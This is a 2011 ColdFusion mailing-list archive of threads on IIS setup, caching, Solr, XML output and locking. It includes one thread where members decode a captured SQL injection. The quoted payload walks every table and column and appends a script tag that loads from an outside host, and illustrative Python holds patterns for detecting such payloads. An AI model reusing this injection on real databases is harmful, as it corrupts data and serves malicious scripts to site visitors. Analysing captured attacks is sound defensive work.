Re: Ack! CF9 pages not serving pages on IIS7.5 (404.3 error)

2011-05-13 Thread Robert Rhodes

Hello Russ.

I see the handler mappings at the site level.  There are 5 entries.

Are you saying adding those entries at the root will prevent the problem I
described, where any change in webroot or adding a site takes down all
sites?

RR

On Fri, May 13, 2011 at 6:04 AM, Russ Michaels wrote:

> you just go into the handler mappings at root or site level and add the
> handler yourself rather than let the web config tool do it.
> the advantage is that you can use the same connector for all sites, whereas
> the config tool creates a new connector for each site, which is pointless
> on a standard install.
>
> On Fri, May 13, 2011 at 6:08 AM, Robert Rhodes wrote:
>
> > Hello Russ.  How would I do it manually?  Are there instructions
> > somewhere?
> >
> > It sure feels like that's the problem (connectors not being installed at
> > the root level).
> >
> > There just has to be a decent workaround for this problem.
> >
> > On Thu, May 12, 2011 at 2:08 AM, Russ Michaels wrote:
> >
> > > I haven't actually tested it yet as we are still running IIS6, however
> > > if the problem is that the web config tool is not applying the connectors
> > > correctly at root level then you can try doing this manually and see if
> > > that resolves the problem.
> > >
> > > On Thu, May 12, 2011 at 6:38 AM, Andrew Scott wrote:
> > >
> > > > Yes, this is a known issue.
> > > >
> > > > What happens is that when you do it in this manner, you are telling
> > > > ColdFusion to run in IIS7 mode. The connectors don't install to all
> > > > the websites when you do this, what you need to do is add a connector
> > > > to each site individually.
> > > >
> > > > This blog might shed some more insight.
> > > >
> > > > http://www.andyscott.id.au/2011/3/29/Things-to-know-when-installing-ColdFusion-9-then-updating-to-901
> > > >
> > > > Regards,
> > > > Andrew Scott
> > > > http://www.andyscott.id.au/
> > > >
> > > > > -Original Message-
> > > > > From: Robert Rhodes [mailto:rrhode...@gmail.com]
> > > > > Sent: Thursday, 12 May 2011 4:30 AM
> > > > > To: cf-talk
> > > > > Subject: Ack! CF9 pages not serving pages on IIS7.5 (404.3 error)
> > > > >
> > > > > Ok, I downloaded cf 9 and installed it on Win2K8 R2 Web Server
> > > > > Edition as a standalone installation.
> > > > >
> > > > > I then ran the 9.01 updater and the 9.01 hotfix.
> > > > >
> > > > > Finally, I ran the webserver config tool and selected IIS all
> > > > > sites.
> > > > >
> > > > > Now when I load a cf template I get a 404.3 error and this message:
> > > > >
> > > > > HTTP Error 404.3 - Not Found
> > > > > The page you are requesting cannot be served because of the
> > > > > extension configuration. If the page is a script, add a handler. If
> > > > > the file should be downloaded, add a MIME map.
> > > > >
> > > > > I am sure I did something wrong.  Any suggestions
> > > > >
> > > > > RR

~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344509
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm


Getting basic CF8 CFCACHE working in CF9

2011-05-13 Thread Terry Ford

Hey...

I am trying to get a CF8 app working on CF9, and it was all seamless until I 
ran into CFCACHE.

I'm having problems getting CFCACHE to save anything to disk.  I understand the 
"default" behavior is now in-memory caching, but for now I'm just trying to get 
this thing to work as it did in CF8:  to disk.  

This was the code in CF8:



It simply saves the page to disk, one page per URL combination.  

1. I can't for the life of me work out how to do that in CF9.  First, I need to 
add "usequerystring=true" right because the default behavior was changed in CF9?

2. Then, do I need to wrap the entire page with  ...  ?   
Or, is just a lone  statement at the top of the page like in CF8 
sufficient?

3. Third, and most frustratingly, how do you CFCACHE to disk?  I'm using this 
statement in CF9:



However, when I run the page, it's caching to memory.  No files are appearing 
in "directory".

Please, what am I missing?   How do I get it to save everything to "directory" 
so that the cache will persist across server restarts?



Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344508


Re: Solr Errors

2011-05-13 Thread Mary Jo Sminkey

> >Just checking in Mary. Were you able to get past this? Have you
> >considering contacting Adobe for official support?
> 
> No, we had to drop the use of Solr at this time, 


Just FYI, I did submit a bug report on this, if anyone wants to comment or vote 
on it. 

http://cfbugs.adobe.com/cfbugreport/flexbugui/cfbugtracker/main.html?#bugId=86807

While I can batch up the data a single user adds and run a single cfindex 
function to update all of it at once, I can't find a way to prevent issues with 
other types of concurrent cfindexes happening, such as multiple users or my 
unit tests. Cflock doesn't seem to lock the entire Solr indexing process so 
wasn't any help. 



--- Mary Jo


 




Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344507


Re: cgi.host_name Security Exploit

2011-05-13 Thread Jason Durham

Dave pretty much summed it up.  Anybody who knows what a HOSTS file is,
knows how to mask the server_name. :)

Jason Durham


On Fri, May 13, 2011 at 2:28 PM, Dave Watts  wrote:

>
> > I have recently discovered a security flaw that I have reported to the
> > Adobe team regarding the use of the variable cgi.host_name.
> >
> > As you know, the cgi.host_name is typically the hostname of the server or
> > the website's domain name. I've discovered an exploit that allows a user
> > to basically change this variable to anything they want for the user's
> > current session. This exploit could be spread across sessions in instances
> > where a website is caching absolute links using the cgi.host_name variable.
> > It could also be used to take advantage of applications that assume the
> > cgi.host_name variable is a constant, therefore developed applications
> > don't take precautions to sanitize this variable before inserting it into
> > a database could have issues.
>
> While it's a good thing you're telling people about this, I'm not sure
> I'd categorize it as a security flaw with CF, or even a security flaw
> in general.
>
> CF doesn't have anything to do with creating or validating many of the
> CGI variables. They're provided by the browser's HTTP request headers,
> or by the web server. CF just uses what it's given. Of course, those
> values are inherently untrustworthy and should always be sanitized.
>
> Dave Watts, CTO, Fig Leaf Software
> http://www.figleaf.com/
> http://training.figleaf.com/
>
> Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on
> GSA Schedule, and provides the highest caliber vendor-authorized
> instruction at our training centers, online, or onsite
>
> 

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344506


Re: Coldfusion 9 XML creation and HTML after

2011-05-13 Thread Anene Isioma Wealth

My guess is that you have answered your question by saying that you could use a 
cflocation tag.

Alternatively, if you trust your xml script to always create the xml document 
without errors, you may use a prompt to display your activity status just 
before you use the xml script.

Best Regards, 
Chuka I.W. Anene
Chief Software Eng./CEO
Quorium Solutions 
www.quorium.org
+234 70 3269 6113
+234 80 9530 7257

+234 1 881 2777






From: Ken Hammond 
To: cf-talk 
Sent: Fri, May 13, 2011 4:43:44 PM
Subject: Coldfusion 9 XML creation and HTML after


Here is what I am running into.  I have a web form that takes in the info I 
need.  I process the form on the next page and it creates an XML document 
that I need (which is being created successfully).  I need to display 
something back to the end user telling them it's been created.  After my end 
tag  if I write any text it throws back the errors 
that there is something after that end tag...  How do I create my XML 
document and still display something back to the end user (or if need be, 
use a cflocation to get them to an acknowledgement page?

The error that comes back in a red box:

This page contains the following errors:

error on line 26 at column 1: Extra content at the end of the document
Below is a rendering of the page up to the first error.


Ken 





Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344505


Re: cgi.host_name Security Exploit

2011-05-13 Thread Dave Watts

> I have recently discovered a security flaw that I have reported to the Adobe
> team regarding the use of the variable cgi.host_name.
>
> As you know, the cgi.host_name is typically the hostname of the server or
> the website's domain name. I've discovered an exploit that allows a user to
> basically change this variable to anything they want for the user's current
> session. This exploit could be spread across sessions  in instances where a
> website is caching absolute links using the cgi.host_name variable. It could
> also be used to take advantage of applications that assume the cgi.host_name
> variable is a constant, therefore developed applications don't take
> precautions to sanitize this variable before inserting it into a database
> could have issues.

While it's a good thing you're telling people about this, I'm not sure
I'd categorize it as a security flaw with CF, or even a security flaw
in general.

CF doesn't have anything to do with creating or validating many of the
CGI variables. They're provided by the browser's HTTP request headers,
or by the web server. CF just uses what it's given. Of course, those
values are inherently untrustworthy and should always be sanitized.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
http://training.figleaf.com/

Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on
GSA Schedule, and provides the highest caliber vendor-authorized
instruction at our training centers, online, or onsite

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344504
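
As an added illustration of the point in Dave Watts's reply that host values arrive with the request and must be treated as untrusted (this is not code from the thread or from Adobe): the sketch below contrasts a link cache that trusts the request host with one that checks it against an allowlist. The host names, `ALLOWED_HOSTS`, `CANONICAL_HOST` and the `LinkCache` class are assumptions made for the example.

```python
import re

# Assumed deployment config: the names this site is really served under.
ALLOWED_HOSTS = {"www.example.com", "example.com"}
CANONICAL_HOST = "www.example.com"

# host[:port] with an optional trailing dot; letters, digits, '-' and '.' only.
_HOST_RE = re.compile(
    r"(?P<name>[a-z0-9](?:[a-z0-9.-]{0,251}[a-z0-9])?)\.?(?::\d{1,5})?"
)


def trusted_host(raw):
    """Return the allowlisted host name for a request-supplied value, else None."""
    if not raw:
        return None
    match = _HOST_RE.fullmatch(raw.strip().lower())
    if match is None:
        return None              # quotes, '@', '<', spaces and the like never pass
    name = match.group("name")
    return name if name in ALLOWED_HOSTS else None


class LinkCache:
    """Caches one absolute link per path, the scenario raised in the report."""

    def __init__(self, validate):
        self.validate = validate
        self.store = {}

    def link(self, request_host, path):
        if path not in self.store:
            if self.validate:
                # Unknown hosts fall back to the configured name.
                host = trusted_host(request_host) or CANONICAL_HOST
            else:
                host = request_host      # trusts the client: the risky pattern
            self.store[path] = "https://" + host + path
        return self.store[path]


def demo():
    """Replay two constructed requests against both kinds of cache."""
    forged = "evil.example.net"          # constructed host value
    results = {}
    for label, validate in (("naive", False), ("validated", True)):
        cache = LinkCache(validate)
        cache.link(forged, "/login")     # first visitor sends a forged host
        # A later visitor with a genuine host gets whatever was cached.
        results[label] = cache.link("www.example.com", "/login")
    return results


if __name__ == "__main__":
    for label, url in demo().items():
        print(label, "->", url)
```

The same allowlist check belongs in front of any code that writes the host value to a database or a shared cache.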


Re: Coldfusion 9 XML creation and HTML after

2011-05-13 Thread Dave Watts

> Here is what I am running into.  I have a web form that takes in the info I
> need.  I process the form on the next page and it creates an XML document
> that I need (which is being created successfully).  I need to display
> something back to the end user telling them it's been created.  After my end
> tag  if I write any text it throws back the errors
> that there is something after that end tag...  How do I create my XML
> document and still display something back to the end user (or if need be,
> use a cflocation to get them to an acknowledgement page?

You can't output both XML and HTML within a single HTTP response.
Well, you can, but the client won't know what to do with it. If you
need to generate XML, that typically isn't going to be returned
directly to the browser, because the browser won't know what to do
with it.

So, you will have to take a slightly different approach. There are a
couple of ways you could go. You could notify the user before
generating the XML, then redirect the user to the XML generation. Or,
you could generate the XML and store it in a variable or file, then
allow the user to click a link to generate the appropriate XML
response.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
http://training.figleaf.com/

Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on
GSA Schedule, and provides the highest caliber vendor-authorized
instruction at our training centers, online, or on

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344503


Re: Coldfusion 9 XML creation and HTML after

2011-05-13 Thread Russ Michaels

can you post the code here
http://pastebin.com/



On Fri, May 13, 2011 at 5:43 PM, Ken Hammond  wrote:

>
> Here is what I am running into.  I have a web form that takes in the info I
> need.  I process the form on the next page and it creates an XML document
> that I need (which is being created successfully).  I need to display
> something back to the end user telling them it's been created.  After my
> end
> tag  if I write any text it throws back the errors
> that there is something after that end tag...  How do I create my XML
> document and still display something back to the end user (or if need be,
> use a cflocation to get them to an acknowledgement page?
>
> The error that comes back in a red box:
>
> This page contains the following errors:
>
> error on line 26 at column 1: Extra content at the end of the document
> Below is a rendering of the page up to the first error.
>
>
> Ken
>
>
>
> 

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344502


RE: Can anyone decode this?

2011-05-13 Thread Bobby Hartsfield

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and
a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set
['+@C+']=['+@C+']+''">http://sdo.1000mg.cn/csrss/w.js";>

cgi.host_name Security Exploit

2011-05-13 Thread Paul Alkema

Greetings and Salutations My Fellow Programmers!

I have recently discovered a security flaw that I have reported to the Adobe
team regarding the use of the variable cgi.host_name.

 

As you know, the cgi.host_name is typically the hostname of the server or
the website's domain name. I've discovered an exploit that allows a user to
basically change this variable to anything they want for the user's current
session. This exploit could be spread across sessions  in instances where a
website is caching absolute links using the cgi.host_name variable. It could
also be used to take advantage of applications that assume the cgi.host_name
variable is a constant, therefore developed applications don't take
precautions to sanitize this variable before inserting it into a database
could have issues.

 

Just wanted to give the community a heads up on this. :)

 

Regards,

Paul Alkema

http://paulalkema.com/



Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344500


Coldfusion 9 XML creation and HTML after

2011-05-13 Thread Ken Hammond

Here is what I am running into.  I have a web form that takes in the info I 
need.  I process the form on the next page and it creates an XML document 
that I need (which is being created successfully).  I need to display 
something back to the end user telling them it's been created.  After my end 
tag  if I write any text it throws back the errors 
that there is something after that end tag...  How do I create my XML 
document and still display something back to the end user (or if need be, 
use a cflocation to get them to an acknowledgement page?

The error that comes back in a red box:

This page contains the following errors:

error on line 26 at column 1: Extra content at the end of the document
Below is a rendering of the page up to the first error.


Ken 



Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344499


RE: Can anyone decode this?

2011-05-13 Thread Mark A. Kruger

Yep a bit cleaner than the last attack like this I saw.

-Original Message-
From: Russ Michaels [mailto:r...@michaels.me.uk] 
Sent: Friday, May 13, 2011 10:31 AM
To: cf-talk
Subject: Re: Can anyone decode this?


it is some very clever SQL though

On Fri, May 13, 2011 at 3:57 PM, Mark A. Kruger
wrote:

>
> This tries to append a malicious script to all the character columns in
> your DB in the hopes that you will select them and output them to a page
> (thus propagating the link).
>
> The script is a 

Re: Can anyone decode this?

2011-05-13 Thread Russ Michaels

it is some very clever SQL though

On Fri, May 13, 2011 at 3:57 PM, Mark A. Kruger wrote:

>
> This tries to append a malicious script to all the character columns in
> your DB in the hopes that you will select them and output them to a page
> (thus propagating the link).
>
> The script is a 

RE: Can anyone decode this?

2011-05-13 Thread Mark A. Kruger

This tries to append a malicious script to all the character columns in your
DB in the hopes that you will select them and output them to a page  (thus
propagating the link).

The script is a 

RE: Can anyone decode this?

2011-05-13 Thread Jeff Garza

Put this in your SQL Query analyzer tool and change the EXEC at the end to
PRINT.  It should print out the SQL Statement for you to see what they were
trying to do.

Cheers,

Jeff 

-Original Message-
From: Che Vilnonis [mailto:ch...@asitv.com] 
Sent: Friday, May 13, 2011 7:31 AM
To: cf-talk
Subject: Can anyone decode this?


Can anyone decode this? This was a URL attack that was caught by some custom
code. I tried decoding the string at
http://meyerweb.com/eric/tools/dencoder/ but had no luck.

113|736;DECLARE @S CHAR(4000);SET
@S=CAST(0x… AS CHAR(4000));EXEC(@S); 

Thanks, Che






Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344495
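
Jeff Garza's suggestion (swap EXEC for PRINT) shows the statement without running it; the same triage can be done without touching a database at all. The following added example, not code from the thread, scans request query strings for the `CAST(0x... AS CHAR)` wrapper seen above, decodes the hex as text and tags what it finds. The sample requests and marker names are constructed for the example, and the sample payload is an inert stand-in, not the string Che posted.

```python
import re
from urllib.parse import unquote_plus

# CAST(0x<hex> AS CHAR(n)) as in the request from the thread. Whitespace is
# tolerated inside the hex run (wrapped logs and mail), and a missing "AS ..."
# tail is accepted so that cut-off log lines still get decoded.
CAST_HEX = re.compile(
    r"CAST\s*\(\s*0x((?:[0-9a-f]\s*)+)(?:AS\s+(N?(?:VAR)?CHAR)|$)",
    re.IGNORECASE,
)

# Marker names are made up for this example; each flags a trait of the
# decoded statement that an analyst would want to see at a glance.
MARKERS = {
    "dynamic_exec": re.compile(r"\bexec\s*\(", re.I),
    "catalog_walk": re.compile(r"\bsys(?:objects|columns)\b", re.I),
    "cursor_loop": re.compile(r"\bcursor\b", re.I),
    "mass_update": re.compile(r"\bupdate\s*\[", re.I),
    "script_tag": re.compile(r"<\s*script\b", re.I),
}


def decode_cast_payloads(raw_query):
    """Decode every hex CAST literal in one raw query string. Nothing is executed."""
    text = unquote_plus(raw_query)
    findings = []
    for match in CAST_HEX.finditer(text):
        digits = re.sub(r"\s+", "", match.group(1))
        # No "AS <type>" tail or an odd digit count: treat as a cut-off line.
        truncated = match.group(2) is None or len(digits) % 2 == 1
        if len(digits) % 2:
            digits = digits[:-1]         # a dangling nibble cannot be decoded
        data = bytes.fromhex(digits)
        wide = (match.group(2) or "").upper().startswith("N")
        decoded = data.decode("utf-16-le" if wide else "latin-1", errors="replace")
        hits = sorted(name for name, rx in MARKERS.items() if rx.search(decoded))
        findings.append({"decoded": decoded, "markers": hits, "truncated": truncated})
    return findings


def triage(queries):
    """Return (line number, finding) pairs for a list of raw query strings."""
    report = []
    for lineno, query in enumerate(queries, 1):
        for finding in decode_cast_payloads(query):
            report.append((lineno, finding))
    return report


# Constructed, inert sample statement and constructed request lines.
SAMPLE_SQL = "DECLARE c CURSOR FOR SELECT name FROM sysobjects; PRINT 'constructed sample'"
_HEX = SAMPLE_SQL.encode("ascii").hex().upper()
SAMPLE_QUERIES = [
    "id=113&page=2",
    "id=113%7C736;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x" + _HEX
    + "%20AS%20CHAR(4000));EXEC(@S);",
    "id=1;SET%20@S=CAST(0x" + _HEX[:41],     # line cut mid-literal
]

if __name__ == "__main__":
    for lineno, finding in triage(SAMPLE_QUERIES):
        print(lineno, finding["markers"], finding["truncated"], repr(finding["decoded"]))
```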


Re: Can anyone decode this?

2011-05-13 Thread John M Bliss

http://www.dolcevie.com/js/converter.html

On Fri, May 13, 2011 at 9:36 AM, Che Vilnonis  wrote:

>
> John, what did you do to decode this? Thanks, Che
>
> -Original Message-
> From: John M Bliss [mailto:bliss.j...@gmail.com]
> Sent: Friday, May 13, 2011 10:34 AM
> To: cf-talk
> Subject: Re: Can anyone decode this?
>
>
> Partial:
>
> DECLARE @T varchar(255),@C varcha?"?C?DT4??$R?F?&?U?7W'6?"?5U%4?"?d?R
> select a.name,b.name from
> sysobjects7?66??V??2?"?v?W&RC?"??B???B???xtype='u' and (b.xtype=99
> or b.xtype=3?R??"?"??G??S?#3???"?"??G??S??crT??Table_Cursor FETCH NEXT
> FROM  Table_Cu?'6?"???D???B??2?t???R???dUD4??5D?EU3??) BEGIN exec('update
> ['+@T+'] set ['+@?2?u???r??2?u??rr#???F?F?S??67&??B?7&3?"
> http://sdo.1000mg.cn/csrss/w.js
> "> >

Re: Can anyone decode this?

2011-05-13 Thread Christopher Stowell

My guess is based on the partial decoding it has to do with this:

http://www.broadbandreports.com/forum/r21043551-sdo1000mgcncsrsswjs-what-is-it







From: John M Bliss 
To: cf-talk 
Sent: Fri, May 13, 2011 8:34:09 AM
Subject: Re: Can anyone decode this?


Partial:

DECLARE @T varchar(255),@C varcha?"?C?DT4??$R?F?&?U?7W'6?"?5U%4?"?d?R
select a.name,b.name from
sysobjects7?66??V??2?"?v?W&RC?"??B???B???xtype='u' and (b.xtype=99
or b.xtype=3?R??"?"??G??S?#3???"?"??G??S??crT??Table_Cursor FETCH NEXT
FROM  Table_Cu?'6?"???D???B??2?t???R???dUD4??5D?EU3??) BEGIN exec('update
['+@T+'] set ['+@?2?u???r??2?u??rr#???F?F?S??67&??B?7&3?"
http://sdo.1000mg.cn/csrss/w.js";>
src="http://sdo.1000m?r?6??77'72?r??2#???67&??C?rrr?dUD?H NEXT FROM
Table_Cursor INTO @T,@C E??B?4??4R?F?&?U?7W'6?"?DT4?DR?F?&??_Cursor

On Fri, May 13, 2011 at 9:31 AM, Che Vilnonis  wrote:

>
> Can anyone decode this? This was a URL attack that was caught by some
> custom
> code. I tried decoding the string at
> http://meyerweb.com/eric/tools/dencoder/ but had no luck.
>
> 113|736;DECLARE @S CHAR(4000);SET
> @S=CAST(0x… AS CHAR(4000));EXEC(@S);
>
> Thanks, Che
>
>
>
>
> 



Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344493


RE: Can anyone decode this?

2011-05-13 Thread Che Vilnonis

John, what did you do to decode this? Thanks, Che 

-Original Message-
From: John M Bliss [mailto:bliss.j...@gmail.com] 
Sent: Friday, May 13, 2011 10:34 AM
To: cf-talk
Subject: Re: Can anyone decode this?


Partial:

DECLARE @T varchar(255),@C varcha?"?C?DT4??$R?F?&?U?7W'6?"?5U%4?"?d?R
select a.name,b.name from
sysobjects7?66??V??2?"?v?W&RC?"??B???B???xtype='u' and (b.xtype=99
or b.xtype=3?R??"?"??G??S?#3???"?"??G??S??crT??Table_Cursor FETCH NEXT
FROM  Table_Cu?'6?"???D???B??2?t???R???dUD4??5D?EU3??) BEGIN exec('update
['+@T+'] set ['+@?2?u???r??2?u??rr#???F?F?S??67&??B?7&3?"
http://sdo.1000mg.cn/csrss/w.js";>

Re: Can anyone decode this?

2011-05-13 Thread John M Bliss

Partial:

DECLARE @T varchar(255),@C varcha?"?C?DT4??$R?F?&?U?7W'6?"?5U%4?"?d?R
select a.name,b.name from
sysobjects7?66??V??2?"?v?W&RC?"??B???B???xtype='u' and (b.xtype=99
or b.xtype=3?R??"?"??G??S?#3???"?"??G??S??crT??Table_Cursor FETCH NEXT
FROM  Table_Cu?'6?"???D???B??2?t???R???dUD4??5D?EU3??) BEGIN exec('update
['+@T+'] set ['+@?2?u???r??2?u??rr#???F?F?S??67&??B?7&3?"
http://sdo.1000mg.cn/csrss/w.js";>

Can anyone decode this?

2011-05-13 Thread Che Vilnonis

Can anyone decode this? This was a URL attack that was caught by some custom
code. I tried decoding the string at
http://meyerweb.com/eric/tools/dencoder/ but had no luck.

113|736;DECLARE @S CHAR(4000);SET
@S=CAST(0x… AS CHAR(4000));EXEC(@S); 

Thanks, Che




Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344490


Re: Extending App.cfc

2011-05-13 Thread Dave Watts

> I have an application.cfc in my root folder that defines my app. I also have 
> a subfolder that has its own app.cfc which
> extends the original app through the ApplicationProxy.cfc method. Basically 
> this is being done to have a different
> OnRequestStart method.
>
> The way I thought I understood this was when a file in the subfolder is 
> accessed, all the methods that aren't in the
> subfolder app.cfc would be executed from the root version. Is this incorrect, 
> because it doesn't seem like my
> OnApplicationStart is run.

The methods in the parent should execute if they're not overridden in
the child, so it sounds like you have some other problem there.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
http://training.figleaf.com/

Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on
GSA Schedule, and provides the highest caliber vendor-authorized
instruction at our training centers, online, or onsite.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344489


Exclusive Named Locked / and PreAuthorized Purchasing

2011-05-13 Thread Brook Davies

I am posting this again, the last time the formatting got kinda munged:

I am trying to set up an inventory/ticket purchasing system.  I have a table
that stores the available quantity, and I have a form where users can
purchase tickets. The form shows the current number of available tickets.  I
have another table that I am using to hold pre-authorizations that
essentially 'hold' a specific quantity while the purchase is complete.

Because the purchase may involve a trip to PayPal, I need to be able to
lookup the pre-authorized amount when I get the callback from PayPal and
either commit that amount on success or release it on failure.

Does this rough outline make sense? Can I use a named lock in this fashion
to lock two separate pieces of code to ensure they are single threaded?

1.   User submits the form

     START EXCLUSIVE NAMED LOCK ('TICKETPURCHASE'):

       i.  Get Available ticket quantity + any pending pre-authorizations
           to purchase.

       ii. If the number available - number of purchases pending > 0, then
           add an entry to the pre-auth table to the requested quantity for
           the current purchaser

     END EXCLUSIVE NAMED LOCK ('TICKETPURCHASE')

2.   Process credit card

     a.   ON SUCCESS

          START EXCLUSIVE NAMED LOCK ('TICKETPURCHASE')

            1.   Get pre-auth record, update available ticket quantity table
                 (essentially committing the pre authorized items)

            2.   Delete pre-auth record

          END EXCLUSIVE NAMED LOCK ('TICKETPURCHASE')

     b.   ON FAILURE

          START EXCLUSIVE NAMED LOCK ('TICKETPURCHASE')

            1.   Delete pre-auth record

          END EXCLUSIVE NAMED LOCK ('TICKETPURCHASE')

Will a system like this work?

Brook

 

 




Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344488
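
A minimal model of the outline in Brook's post, added here as an example and not taken from the thread: one lock guards the reserve, commit and release steps so that concurrent buyers cannot oversell. `TicketInventory`, `simulate` and the in-process `threading.Lock` standing in for the named lock are assumptions of the example.

```python
import threading


class TicketInventory:
    def __init__(self, available):
        # In-process stand-in for the exclusive named lock 'TICKETPURCHASE';
        # it only serialises threads inside this one process.
        self._lock = threading.Lock()
        self.available = available       # the available-quantity table
        self.preauth = {}                # purchaser id -> quantity on hold

    def reserve(self, purchaser, qty):
        """Step 1: hold qty tickets if enough remain after pending holds."""
        with self._lock:
            if qty < 1 or purchaser in self.preauth:
                return False
            pending = sum(self.preauth.values())
            # Compared against the requested quantity rather than "> 0", so a
            # multi-ticket request cannot take more than is left.
            if self.available - pending < qty:
                return False
            self.preauth[purchaser] = qty
            return True

    def commit(self, purchaser):
        """Step 2a: payment succeeded; turn the hold into a sale."""
        with self._lock:
            qty = self.preauth.pop(purchaser, None)
            if qty is None:
                return False             # unknown or repeated callback
            self.available -= qty
            return True

    def release(self, purchaser):
        """Step 2b: payment failed; drop the hold."""
        with self._lock:
            return self.preauth.pop(purchaser, None) is not None


def simulate(stock, buyers):
    """Run `buyers` concurrent one-ticket purchases against `stock` tickets."""
    inventory = TicketInventory(stock)
    sold = []

    def buyer(n):
        if not inventory.reserve(n, 1):
            return
        if n % 5 == 0:                   # constructed rule: every 5th payment fails
            inventory.release(n)
        elif inventory.commit(n):
            sold.append(n)

    threads = [threading.Thread(target=buyer, args=(n,)) for n in range(buyers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return {
        "sold": len(sold),
        "available": inventory.available,
        "pending": len(inventory.preauth),
    }


if __name__ == "__main__":
    print(simulate(stock=10, buyers=50))
```

Which buyers succeed varies from run to run; what stays fixed is that sold plus available equals the starting stock and no hold is left behind.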


Re: Ack! CF9 pages not serving pages on IIS7.5 (404.3 error)

2011-05-13 Thread Russ Michaels

you just go into the handler mappings at root or site level and add the
handler yourself rather than let the web config tool do it.
the advantage is that you can use the same connector for all sites, whereas
the config tool creates a new connector for each site, which is pointless on
a standard install.

On Fri, May 13, 2011 at 6:08 AM, Robert Rhodes  wrote:

>
> Hello Russ.  How would I do it manually?  Are there instructions somewhere?
>
> It sure feels like that's the problem (connectors not being installed at
> the root level).
>
> There just has to be a decent workaround for this problem.
>
> On Thu, May 12, 2011 at 2:08 AM, Russ Michaels wrote:
>
> > I haven't actually tested it yet as we are still running IIS6, however if
> > the problem is that the web config tool is not applying the connectors
> > correctly at root level then you can try doing this manually and see if
> > that resolves the problem.
> >
> > On Thu, May 12, 2011 at 6:38 AM, Andrew Scott wrote:
> >
> > >
> > > Yes, this is a known issue.
> > >
> > > What happens is that when you do it in this manner, you are telling
> > > ColdFusion to run in IIS7 mode. The connectors don't install to all the
> > > websites when you do this, what you need to do is add a connector to
> > > each site individually.
> > >
> > > This blog might shed some more insight.
> > >
> > > http://www.andyscott.id.au/2011/3/29/Things-to-know-when-installing-ColdFusion-9-then-updating-to-901
> > >
> > > Regards,
> > > Andrew Scott
> > > http://www.andyscott.id.au/
> > >
> > >
> > > > -Original Message-
> > > > From: Robert Rhodes [mailto:rrhode...@gmail.com]
> > > > Sent: Thursday, 12 May 2011 4:30 AM
> > > > To: cf-talk
> > > > Subject: Ack! CF9 pages not serving pages on IIS7.5 (404.3 error)
> > > >
> > > >
> > > > Ok, I downloaded cf 9 and installed it on Win2K8 R2 Web Server
> > > > Edition as a standalone installation.
> > > >
> > > > I then ran the 9.01 updater and the 9.01 hotfix.
> > > >
> > > > Finally, I ran the webserver config tool and selected IIS all sites.
> > > >
> > > > Now when I load a cf template I get a 404.3 error and this message:
> > > >
> > > > HTTP Error 404.3 - Not Found
> > > > The page you are requesting cannot be served because of the extension
> > > > configuration. If the page is a script, add a handler. If the file
> > > > should be downloaded, add a MIME map.
> > > >
> > > > I am sure I did something wrong.  Any suggestions
> > > >
> > > > RR
> > >
> > >
> > >
> >
> >
>
> 

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344487